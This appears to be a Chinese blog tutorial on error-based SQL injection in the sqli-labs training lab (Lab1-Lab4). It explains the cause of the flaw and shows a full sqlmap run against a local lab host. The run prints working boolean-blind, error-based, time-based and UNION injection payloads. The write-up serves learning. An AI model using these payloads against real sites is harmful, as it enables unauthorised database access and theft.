sqli-labs的前4个实验(Lab1-Lab4)是基于SQL报错注入(Error-based injection)。
1.什么是SQL报错注入?这是一种页面响应形式。响应过程如下:当用户在前台页面上输入检索内容时,后台将前台页面上输入的检索内容
无加区别的拼接成sql语句,送给数据库执行。数据库将执行结果返回给后台。后台将数据库执行结果
无加区别的显示到前台页面上。上面这句话中,我用了2个"无加区别"----后台对于输入输出的合理性没有做检查。如果用户在页面输入处输入单引号',数据库在执行拼接后sql语句时,由于单引号不匹配,执行错误并输出错误信息。后台收到并直接将错误信息显示在页面上。
上面的描述可能不够形象,让我用Lab1做演示。首先在浏览器为参数id输入数字1,此时浏览器得到的响应结果如图:
接着用单引号'作为where子句的过滤条件,得到错误的响应:
对比前后两次输入,数据库对于单引号输入的响应是提示sql语句存在语法错误。当用户输入'后,数据库的响应是这种形式,即系统存在报错注入。至于错误的成因,mysql注入天书的作者已经写的很明了,我就不再赘述。
2.当我们探测到注入点后,就需要准备payload。然而,这里存在一个问题:Lab1-Lab4能接受输入的位置只有浏览器的URL,我们是不能直接往URL中输入payload,如union select这些语句,这会得到与预想不同的结果:
摆在我们面前的问题是如何输入有效的payload?解决办法是使用URL编码工具,我再网上找了个UI工具,由它代为转码。读者可以使用在线编码工具。比如,上面这串payload经过编码后,在贴到浏览器中,可以正确获得MYSQL版本:
3.比手动寻找注入点更高效的sqlmap注入工具。
C:\Users\Eugene\Desktop\devtools\Penetrate Test\sqlmap>sqlmap.py -u "http://192.168.80.136/Less-1/?id=1"
___
__H__
___ ___["]_____ ___ ___ {1.2.4.22#dev}
|_ -| . ["] | .'| . |
|___|_ [)]_|_|_|__,| _|
|_|V |_| http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
[*] starting at 15:51:13
[15:51:15] [INFO] testing connection to the target URL
[15:51:15] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:51:15] [INFO] testing if the target URL content is stable
[15:51:16] [INFO] target URL content is stable
[15:51:16] [INFO] testing if GET parameter 'id' is dynamic
[15:51:16] [INFO] confirming that GET parameter 'id' is dynamic
[15:51:16] [INFO] GET parameter 'id' is dynamic
[15:51:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[15:51:16] [INFO] heuristic (XSS) test shows that GET parameter 'id' might be vulnerable to cross-site scripting (XSS) attacks
[15:51:16] [INFO] testing for SQL injection on GET parameter 'id'
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] Y
for the remaining tests, do you want to include all tests for 'MySQL' extending provided level (1) and risk (1) values? [Y/n] Y
[15:51:27] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[15:51:27] [WARNING] reflective value(s) found and filtering out
[15:51:27] [INFO] GET parameter 'id' appears to be 'AND boolean-based blind - WHERE or HAVING clause' injectable (with --string="Your")
[15:51:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (BIGINT UNSIGNED)'
[15:51:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (BIGINT UNSIGNED)'
[15:51:27] [INFO] testing 'MySQL >= 5.5 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXP)'
[15:51:27] [INFO] testing 'MySQL >= 5.5 OR error-based - WHERE or HAVING clause (EXP)'
[15:51:27] [INFO] testing 'MySQL >= 5.7.8 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (JSON_KEYS)'
[15:51:27] [INFO] testing 'MySQL >= 5.7.8 OR error-based - WHERE or HAVING clause (JSON_KEYS)'
[15:51:27] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)'
[15:51:27] [INFO] GET parameter 'id' is 'MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)' injectable
[15:51:27] [INFO] testing 'MySQL inline queries'
[15:51:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (comment)'
[15:51:27] [WARNING] time-based comparison requires larger statistical model, please wait....... (done)
[15:51:27] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[15:51:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP - comment)'
[15:51:27] [INFO] testing 'MySQL > 5.0.11 stacked queries (query SLEEP)'
[15:51:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query - comment)'
[15:51:27] [INFO] testing 'MySQL < 5.0.12 stacked queries (heavy query)'
[15:51:27] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind'
[15:51:37] [INFO] GET parameter 'id' appears to be 'MySQL >= 5.0.12 AND time-based blind' injectable
[15:51:37] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[15:51:37] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
[15:51:37] [INFO] 'ORDER BY' technique appears to be usable. This should reduce the time needed to find the right number of query columns. Automatically extending the range for current UNION query injection technique test
[15:51:37] [INFO] target URL appears to have 3 columns in query
[15:51:37] [INFO] GET parameter 'id' is 'Generic UNION query (NULL) - 1 to 20 columns' injectable
GET parameter 'id' is vulnerable. Do you want to keep testing the others (if any)? [y/N] y
sqlmap identified the following injection point(s) with a total of 50 HTTP(s) requests:
---
Parameter: id (GET)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: id=1' AND 5514=5514 AND 'jZeb'='jZeb
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
Payload: id=1' AND (SELECT 9749 FROM(SELECT COUNT(*),CONCAT(0x7171627a71,(SELECT (ELT(9749=9749,1))),0x716b626a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'FCQj'='FCQj
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind
Payload: id=1' AND SLEEP(5) AND 'apnf'='apnf
Type: UNION query
Title: Generic UNION query (NULL) - 3 columns
Payload: id=-6456' UNION ALL SELECT NULL,NULL,CONCAT(0x7171627a71,0x6c66417a454856424d58574259454652786e437a675a4b4647436d726e734e63476d6b6b74556b73,0x716b626a71)-- GuAj
---
[15:51:44] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL >= 5.0
[15:51:44] [INFO] fetched data logged to text files under 'C:\Users\Eugene\.sqlmap\output\192.168.80.136'
[*] shutting down at 15:51:44